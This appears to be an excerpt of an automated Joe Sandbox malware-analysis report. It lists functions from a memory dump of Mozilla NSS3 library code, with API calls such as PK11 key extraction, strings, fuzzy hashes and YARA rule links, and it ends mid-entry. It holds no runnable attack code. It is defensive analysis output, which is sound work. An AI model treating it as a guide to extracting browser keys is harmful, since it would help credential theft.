Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 23b06cac301ea6622304fdb487724930ff259abdcd1d6d36b82333cd1203ff25
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 3311BBB6F002055BE7006EB67E49BABB6EC9F5455EF054039EC09D7741FB60E908C6B2

Function 6C788C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C788C1B
EnterCriticalSection.KERNEL32 ref: 6C788C34
PL_ArenaAllocate.NSS3 ref: 6C788C65
PR_Unlock.NSS3 ref: 6C788C9C
PR_Unlock.NSS3 ref: 6C788CB6

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Strings

KRAM, xrefs: 6C788C8F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction ID: 547ec394d24962ed5b105f2fa450ea0697163e601ddea7ecd06b024d54738e29
Opcode Fuzzy Hash: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction Fuzzy Hash: 792180B1A066018FD700AF79C588559BBF4FF05318F0589BED988CB701DB31D885CB81

Function 6C798E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EA2

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EC3
TlsGetValue.KERNEL32(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C798EF1
PR_Unlock.NSS3 ref: 6C798F20

Strings

b.{l, xrefs: 6C798E96, 6C798F25

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.{l
API String ID: 1978757487-175572528
Opcode ID: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction ID: 8302d60c6188c817c9d6b4ce8d24bdaaa225a8724e1a7c3c6bf5d42597db3298
Opcode Fuzzy Hash: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction Fuzzy Hash: 0D218B74A096059FDB00AF39E688699BBF4FF48318F05456EEC989BB41D730E854CBC2

Function 6C81A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6C81A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81A415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6C81A5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6C81A5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6C81A5C8

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6C81A5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C81A5E8

Strings

*@, xrefs: 6C81A589

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: b510f5cae1fd053efa5c3ae24fcdec9595166efee1d6b3d7a339bd64aeb08f68
Instruction ID: 458ebc16fcc33d2ef0b8870cfdc26366fac8f2003bb738c53ed0f4b6d1f34fc3
Opcode Fuzzy Hash: b510f5cae1fd053efa5c3ae24fcdec9595166efee1d6b3d7a339bd64aeb08f68
Instruction Fuzzy Hash: 6721F3B1C082099BC7109F69DE016DFBBF4AF8932CF014628EC5833B41E734A6488BD2

Function 6C882C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882CA0
PR_ExitMonitor.NSS3 ref: 6C882CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C882CD1
strdup.MOZGLUE(?), ref: 6C882CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C882D27

Strings

Loaded library %s (static lib), xrefs: 6C882D22

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction ID: d93799ae56fafeeebc771295f26747c40a0f93a597644509fc4fd2bda2b35b0b
Opcode Fuzzy Hash: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction Fuzzy Hash: A51190B16022149FEB309F19EA48A6677B5AB4531DF14893DE80987F42E735ED08CBE1

Function 6C7D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B
TlsGetValue.KERNEL32(00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1044
free.MOZGLUE(00000000,?,00000800,6C76EF74,00000000), ref: 6C7D1064

Strings

security, xrefs: 6C7D1025

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction ID: 0b5bee2b760fce064967e97bbf062e440c7190f13aecb7cb99f04bcd14d13fa1
Opcode Fuzzy Hash: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction Fuzzy Hash: 1A016670A402909BE7303F3D9E08B563A68BF0276CF020535E80897E52EB70F614EBD1

Function 6C800570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C7EC89B,FFFFFE80,?,6C7EC89B), ref: 6C80058B
free.MOZGLUE(?,?,6C7EC89B), ref: 6C800592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7EC89B), ref: 6C8005AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7EC89B), ref: 6C8005C2
DeleteCriticalSection.KERNEL32(6C7EC89B,?,6C7EC89B), ref: 6C8005D8
free.MOZGLUE(?,?,6C7EC89B), ref: 6C8005DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6C7EC89B), ref: 6C8005FB

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: a80f9cfa7e2361293286eadd77e9f04e5191216abd6eee6ca9fdb38d1719f218
Instruction ID: a8fc679862f39568c21e34461445ffa0f88a995848afd1b28a1c1f7fff8b3889
Opcode Fuzzy Hash: a80f9cfa7e2361293286eadd77e9f04e5191216abd6eee6ca9fdb38d1719f218
Instruction Fuzzy Hash: 57014CB1B092615BEE30AFA49D0DB4E7B78670731DF100830E50662F41D768B608C3D3

Function 6C812E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C813046

Part of subcall function 6C7FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7E7FFB), ref: 6C81312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C813154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C812E8B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C7FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7E9BFF,?,00000000,00000000), ref: 6C7FF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C7E7FFA), ref: 6C812EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81317B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction ID: ffc28e9e2f587862f9c591e0765fc7ad341e2c3786ab7188ead6bacb55664735
Opcode Fuzzy Hash: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction Fuzzy Hash: E3A1EE71A002199FDB24CF54CC84BEAB7B5EF4A308F048599ED49A7B41E731AE85CF91

Function 6C7DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7DED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C7DEDCE

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

free.MOZGLUE(00000000,?,?,?,?,6C7DB04F), ref: 6C7DEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7DEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7DEEFB

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction ID: 9056444fcecb2b69c2cf471113fa65ba2cb87755b94924bd09a21a27aa432bed
Opcode Fuzzy Hash: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction Fuzzy Hash: 89815CB5A0020A9FEB15CF55DA85AABB7F5AF88308F15443CE8159B751DB30F814CBA1

Function 6C7DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

PR_Now.NSS3 ref: 6C7DCD35

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

Part of subcall function 6C7C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

PR_GetCurrentThread.NSS3 ref: 6C7DCD54

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Part of subcall function 6C7C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771CCC,00000000,00000000,?,?), ref: 6C7C729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7DCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7DCE2C

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7DCE40

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

Part of subcall function 6C7DCEE0: PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC
Part of subcall function 6C7DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction ID: fa63196bc1c22ed2c91b3c77cd112e20aa7530ae00fd7f5aeaac37e2bcf09cc5
Opcode Fuzzy Hash: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction Fuzzy Hash: F651D4B6A002129FEB10EF69DE45BAA77F9EF48349F260534D84997740EB31F904CB91

Function 6C7DE680 Relevance: 9.2, APIs: 6, Instructions: 169threadmemoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C7DE6C4

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_GetCurrentThread.NSS3 ref: 6C7DE6FE
PORT_ArenaGrow_Util.NSS3(?,?,?,00000000), ref: 6C7DE726
PR_GetCurrentThread.NSS3 ref: 6C7DE772
free.MOZGLUE(00000000), ref: 6C7DE81F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThreadUtil$Alloc_ArenaGrow_Valuefreemalloc
String ID:
API String ID: 1348558050-0
Opcode ID: 24e8a5a3d02295553a0c0159ac1cce9da7fb7044585a31b23544b5f4dc559ee8
Instruction ID: d54998b3fa49b605d777b298a32de4b85d7f4bf918484eeb332cabccc348d859
Opcode Fuzzy Hash: 24e8a5a3d02295553a0c0159ac1cce9da7fb7044585a31b23544b5f4dc559ee8
Instruction Fuzzy Hash: 815149B5E002199FEF058FA9CA84AAEB7B5FF48218F154438E915A7B11D731F851CBE0

Function 6C7E0640 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C7E0676

Memory Dump Source

